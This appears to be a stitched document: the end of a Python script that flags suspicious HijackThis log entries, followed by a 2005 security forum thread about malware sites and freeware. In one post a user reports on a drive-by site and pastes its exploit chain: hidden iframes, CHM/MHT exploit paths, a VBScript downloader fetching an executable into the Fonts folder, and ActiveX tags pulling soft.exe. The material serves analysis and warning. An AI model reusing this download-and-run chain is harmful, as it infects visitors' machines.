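            if re.fullmatch(r"[a-z]:(\\windows)?", parent):
                return section, f"autorun launched from directory {parent}"
            if _random_looking(name):
                return section, f"autorun with random-looking name {name}"
    if section == "O15":
        return section, "site or IP added to the IE Trusted Zone"
    if section == "O18" and body.startswith("Filter:"):
        return section, "MIME filter hooks content before IE renders it"
    if section == "O20":
        return section, "Winlogon Notify DLL loads at every logon"
    if section == "O23" and "Unknown owner" in body:
        return section, "service with no identified vendor"
    return None


def triage_log(text: str):
    """Run triage over a whole log; returns [(section, line, reason), ...]."""
    hits = []
    for line in text.splitlines():
        r = triage_line(line)
        if r:
            hits.append((r[0], line.strip(), r[1]))
    return hits


def section_counts(hits):
    """Count hits per HJT section, e.g. {'O4': 3, 'O15': 2}."""
    counts = {}
    for section, _, _ in hits:
        counts[section] = counts.get(section, 0) + 1
    return counts


if __name__ == "__main__":
    for section, line, reason in triage_log(SAMPLE_LOG):
        print(f"{section:4} {reason}\n     {line}")
```

Run against the clean log it stays silent apart from nothing; against the infected one it lights up the same sections the thread points at.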

clif_notes
Freeware Research Specialist
Posts: 562
Joined: Wed Feb 02, 2005 12:13 am
Location: OHIO, USA

Postby clif_notes » Thu Jun 09, 2005 6:29 pm

Hi Tom,

I noticed in your log that you use WinWall. Is it this program?
http://www.net-session.com/index.php?page=winwall

If so, would you like to provide a simple review of it?
Likes, dislikes, ease of use, etc.
http://clifnotes.net
Devoted to promoting freeware and free information

TeMerc
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ

Postby TeMerc » Thu Jun 09, 2005 7:25 pm

clif_notes wrote:Hi Tom,

I noticed in your log that you use WinWall. Is it this program?
http://www.net-session.com/index.php?page=winwall

If so, would you like to provide a simple review of it?
Likes, dislikes, ease of use, etc.

Yup, that's it, and yes, I'll write something up about it, np.


Postby JeanInMontana » Thu Jun 09, 2005 8:38 pm

Skoobido??? hm?


Postby TeMerc » Mon Jun 13, 2005 3:15 pm

OK, well this week brought me a new site to try and get infected with.

The site:
hxxp:crazy-toolbar.com

From Webhelper:
Webhelper: crazy-toolbar.com Off limits

Heed this warning, as you can end up having your explorer.exe, which is a major part of Windows, overwritten if you go to this site.

I just disabled the Internet and ran the soft.exe, and it changes the explorer.exe version and size, and you will get a message to use your CD to fix the overwrite.

Code:


69.50.190.131/?to=nan38&from=in : exp2.girlspark.net
crazy-toolbar.com/home/liter/
<iframe src="http://crazy-toolbar.com/new2/web.php?account=liter" width="1" height="1">
crazy-toolbar.com/new2/hta.php?account=liter

  <iframe src="http://crazy-toolbar.com/new11/accliter/web.php?account=liter" width="1" height="1">
crazy-toolbar.com/new11/accliter/jar.php?account=liter" CODE="Counter.class

  <iframe src="http://crazy-toolbar.com/new12/web.php?account=liter" width="1" height="1">
crazy-toolbar.com/new12/classload.jar" CODE="GetAccess.class
crazy-toolbar.com/soft.php?login=liter&num=12

  <iframe src="http://crazy-toolbar.com/new4/accliter/web.php" width="1" height="1">
foo. mht!${PATH}/exploit. chm : :/exploit.htm
**
  <iframe src="http://crazy-toolbar.com/new13/accliter/web.php" width="1" height="1">
foo .mht!${PATH}/exploit .chm : :/exploit.htm

  <iframe src="http://crazy-toolbar.com/new10/web.php?account=liter" width="1" height="1">
  <iframe src="http://crazy-toolbar.com/new7/web.php?account=liter" width="1" height="1">
Set shell=CreateObject("WScript.Shell")

ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"

set dot=CreateObject("Msxml2.XMLHTTP")

dot.Open "GET", "hxxp://crazy-toolbar.com/soft.php?login=liter&num=7

  <iframe src="http://crazy-toolbar.com/new6/web.php?account=liter" width="1" height="1">
<body>
  <script language="javascript">
   document.write("<OBJECT NAME='web' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='http://crazy-toolbar.com/liter/61/soft.exe'>");
   document.write("<OBJECT NAME='web' CLASSID='CLSID:527196a4-b1a3-4647-931d-37ba5af23037' CODEBASE='http://crazy-toolbar.com/liter/62/soft.exe'>");
  </script>
 </body>

3/25/2005: MD5: F97E7F7049525D57C175052110B1B7FF

6/9/2005  MD5: BBAAF909211C70948DE2486B4D44F915
MD5: BBAAF909211C70948DE2486B4D44F915


Then, bobince from DoxDesk chimed in with:
The exploits at crazy-toolbar also load iSrvs/Delprot (iSearch, iDownload), Transponder/Aurora (Nail, DirectRevenue), ISTbar/YSB, ILookup/NSL29, SpySherriff, a couple of backdoors and some new stuff from Matcash I hadn't seen before. Also it puts the entire internet in various types of Trusted Zone so that anyone can load any old malware in the future.

To Be Avoided.


Got that from this thread

Now, do I have to tell you what happened when I went there?

Well, I got one alert from Avast! asking me what to do with a file, which was a Trojan Horse TR/Exploit.MS05-002.Ani.A


And that was it, I was able to navigate around the site with no problems. All subsequent scans came up negative, no malwares or anything found. Take this !*!* malwares, and this too FU


Postby JeanInMontana » Mon Jun 13, 2005 3:48 pm

Well Mr. Merc, I think you are bound to get bored soon with teasing these sites. When are you going to start figuring out how to get rid of the stuff??? Hmmmm???


Postby TeMerc » Mon Jun 13, 2005 4:29 pm

JeanInMontana wrote:Well Mr. Merc, I think you are bound to get bored soon with teasing these sites. When are you going to start figuring out how to get rid of the stuff??? Hmmmm???

Hmmmm............I think I'm already fairly well versed in that, haven't I, Mz. Obfuscated? ;) rofl


Postby JeanInMontana » Mon Jun 13, 2005 4:33 pm

Oh, you misunderstand me. I mean writing some fixes for some of the new stuff. :roll: Those new infections are so obfuscated no one has a fix. Ya know, let some of that stuff on the box and get rid of it! Live a little.


Postby clif_notes » Mon Jun 13, 2005 8:44 pm

I second that. I've intentionally infected myself before just to see what I could do about it, but I'm afraid to do it now, being limited to one machine.

I think it'd be fun :!:


Postby TeMerc » Fri Aug 05, 2005 11:39 pm

I'm going to continue with my XP SP2 testing for a bit more.

Then I'll begin to infect myself for schooling and such. I am quite confident it will be fun.
